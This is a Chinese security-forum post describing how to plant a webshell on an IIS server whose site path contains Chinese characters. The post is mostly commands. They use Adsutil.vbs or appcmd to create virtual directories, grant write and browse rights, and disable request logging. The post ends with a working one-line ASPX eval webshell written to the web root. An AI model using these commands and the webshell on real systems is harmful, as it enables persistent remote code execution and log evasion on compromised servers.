安全矩阵

 找回密码
 立即注册
搜索
查看: 2889|回复: 0

利用IIS虚拟目录写马至中文路径

[复制链接]

145

主题

192

帖子

817

积分

高级会员

Rank: 4

积分
817
发表于 2022-4-26 10:48:51 | 显示全部楼层 |阅读模式
利用IIS虚拟目录写马至中文路径         
0x01 前言
知识星球看到@紫陌师傅分享的一篇《利用IIS虚拟目录绕过os-shell中文目录》,所以想着对他文中提到的利用Adsutil.vbs脚本创建虚拟目录写马至中文路径的方式进行复现,但仅适用于低版本IIS,高版本要用appcmd。

0x02 思路分享
Adsutil.vbs是Windows系统自带的一个脚本,可用于命令行下管理IIS,默认在C:\inetpub\AdminScripts目录下,但只在IIS6默认会有这个脚本,IIS7及以上需要单独安装“IIS6脚本工具”组件才有。


我们可以通过执行Adsutil.vbs脚本获取目标网站的各种信息,如:网站ID、绑定域名、应用程序池和查看/创建/删除虚拟目录等,实战场景中还得去删除下创建的虚拟目录,否则可能一直存在。

主要用到命令:
  1. 所有网站ID:cscript.exe c:\inetpub\adminscripts\adsutil.vbs enum /P W3SVC
  2. 对象绑定信息:cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/2/serverbindings
  3. 创建虚拟目录:cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/2/root/hacking/ IisWebVirtualDir
  4. 删除虚拟目录:cscript.exe c:\inetpub\adminscripts\adsutil.vbs delete w3svc/2/root/hacking
  5. 设置物理路径:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/path C:\ProgramData\testing
复制代码



其他常用命令:
  1. IIS应用池名:cscript.exe C:\inetpub\AdminScripts\adsutil.vbs enum /P W3SVC/APPPOOLS
  2. IIS应用池信息:cscript.exe C:\inetpub\AdminScripts\adsutil.vbs enum W3SVC/APPPOOLS/DefaultAppPool
  3. 对象虚拟目录:cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/2/root
  4. 不设置日志:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/DontLog 1
  5. 设置写权限:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/accesswrite 1
  6. 设置读权限:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/accessread 1
  7. 可列目录权限:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/enabledirbrowsing 1
  8. 启动2号Web服务:cscript.exe c:\inetpub\adminscripts\adsutil.vbs start_server w3svc/2
复制代码
遇到IIS7及以上场景时我们也可以通过执行appcmd获取IIS中的所有网站名称和对应的物理路径,快速定位到目标网站的绝对路径,也能查看/创建/删除虚拟目录等,方便我们写马至中文路径。
  1. <code>查看虚拟目录:</code><code>C:\Windows\System32\inetsrv\appcmd list vdir</code>
  2. <code>创建虚拟目录:</code><code>C:\Windows\System32\inetsrv\appcmd add vdir /app.name:www.testing.com/ /path:/hacking1 /physicalPath:C:\ProgramData\testing1</code>
  3. <code>删除虚拟目录:</code><code>C:\Windows\System32\inetsrv\appcmd delete vdir "www.testing.com/hacking1"</code>
复制代码




注:使用appcmd创建虚拟目录时得注意下格式,app.name网站名称,path虚拟目录别名,physicalPath物理路径,还得注意app.name、path中的/,这两斜杠都需要保留,否则可能会出错。


使用Adsutil.vbs脚本或appcmd建立虚拟目录后就可以无视目标网站物理路径中存在的中文字符了。

因为这是直接往虚拟目录中写入文件,所以可以成功将Webshell写入至中文路径,如下图所示...。
  1. echo ^<%%@ Page Language="Jscript"%%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%%^> > C:\inetpub\wwwroot\中文测试\shell.aspx
复制代码





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 10:29 , Processed in 0.013342 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表